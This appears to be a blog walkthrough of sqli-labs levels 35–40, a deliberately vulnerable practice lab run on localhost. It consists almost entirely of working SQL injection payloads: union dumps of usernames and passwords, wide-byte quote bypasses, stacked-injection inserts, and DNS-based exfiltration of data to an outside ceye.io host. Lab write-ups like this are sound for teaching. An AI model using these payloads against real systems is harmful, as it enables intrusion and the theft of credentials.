sqli-35,36,37,38,39,40

三十五关

http://localhost/sqli-labs/Less-35/?id=-1 union select 1,database(),3  #数据库

http://localhost/sqli-labs/Less-35/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() #表

http://localhost/sqli-labs/Less-35/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=0x7573657273 #字段

http://localhost/sqli-labs/Less-35/?id=-1 union select 1,group_concat(username,password),3 from users  #数据

三十六关

http://127.0.0.1/sqli-labs/Less-36/?id=-1%EF%BF%BD%27union%20select%201,database(),3--+  #数据库

http://127.0.0.1/sqli-labs/Less-36/?id=-1%EF%BF%BD%27union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+  #数据库

http://127.0.0.1/sqli-labs/Less-36/?id=-1%EF%BF%BD%27union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=0x7573657273--+  #字段

http://127.0.0.1/sqli-labs/Less-36/?id=-1%EF%BF%BD%27union%20select%201,group_concat(username,password),3%20from%20users--+  #数据

三十七关

uname=admin%df' or 1 order by 2-- &passwd=admin&submit=Submit  #字段

uname==1%df' union select 1,database()-- &passwd=admin&submit=Submit  #数据库

uname==1%df' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()-- &passwd=admin&submit=Submit  #数据表

uname==1%df' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273-- &passwd=admin&submit=Submit  #字段

uname==1%df' union select 1,group_concat(username,password) from users-- &passwd=admin&submit=Submit  #数据

三十八关

http://localhost/sqli-labs/Less-38/?id=-1%df' union select 1,2,3 or '1  #闭合点

http://localhost/sqli-labs/Less-38/?id=0%df%27%20union%20select%201,1,group_concat(schema_name)%20from%20information_schema.schemata--+  #数据库

http://localhost/sqli-labs/Less-38/?id=0%df%27%20union%20select%201,1,group_concat(table_name)%20from%20information_schema.tables where table_schema=0x7365637572697479--+  #数据表

http://localhost/sqli-labs/Less-38/?id=0%df%27%20union%20select%201,1,group_concat(column_name)%20from%20information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273--+  #字段

http://localhost/sqli-labs/Less-38/?id=0%df%27%20union%20select%201,1,group_concat(username,password)%20from%20users--+  #数据

http://localhost/sqli-labs/Less-38/?id=1'; insert into users(id,username,password) values ('133','less-38','stacked-injection')--+  #堆叠注入

三十九关

 http://localhost/sqli-labs/Less-39/?id=-1 union select 1,2,3--+  #闭合点

http://localhost/sqli-labs/Less-39/?id=-1 union select 1,2,database()--+  #数据库

http://localhost/sqli-labs/Less-39/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+  #数据表

http://localhost/sqli-labs/Less-39/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273--+  #字段

http://localhost/sqli-labs/Less-39/?id=-1 union select 1,2,group_concat(username,password) from users--+  #数据

四十关

http://localhost/sqli-labs/Less-40/?id=1') and LOAD_FILE(CONCAT('\\\\',(SELECT database()),'.reh927.ceye.io\\abc'))||('1  #数据库

http://localhost/sqli-labs/Less-40/?id=1') and LOAD_FILE(CONCAT('\\\\',(SELECT table_name from information_schema.tables where table_schema=database() limit 3,1),'.reh927.ceye.io\\abc'))||('1  #数据表http://localhost/sqli-labs/Less-40/?id=1') and LOAD_FILE(CONCAT('\\\\',(SELECT column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),'.reh927.ceye.io\\abc'))||('1  #字段username

http://localhost/sqli-labs/Less-40/?id=1') and LOAD_FILE(CONCAT('\\\\',(SELECT column_name from information_schema.columns where table_schema=database() and table_name='users' limit 2,1),'.reh927.ceye.io\\abc'))||('1  #字段password

http://localhost/sqli-labs/Less-40/?id=1') and LOAD_FILE(CONCAT('\\\\',(SELECT username from users limit 3,1),'.reh927.ceye.io\\abc'))||('1  #用户数据

http://localhost/sqli-labs/Less-40/?id=1') and LOAD_FILE(CONCAT('\\\\',(SELECT password from users limit 3,1),'.reh927.ceye.io\\abc'))||('1  #密码数据

http://localhost/sqli-labs/Less-40/?id=1%df'); insert into users (id,username,password) values(40,%27hello%27,%27xiaohuihui%27)--+  #堆叠注入

posted @ 2020-05-03 13:41  llcnKill  阅读(192)  评论(0)    收藏  举报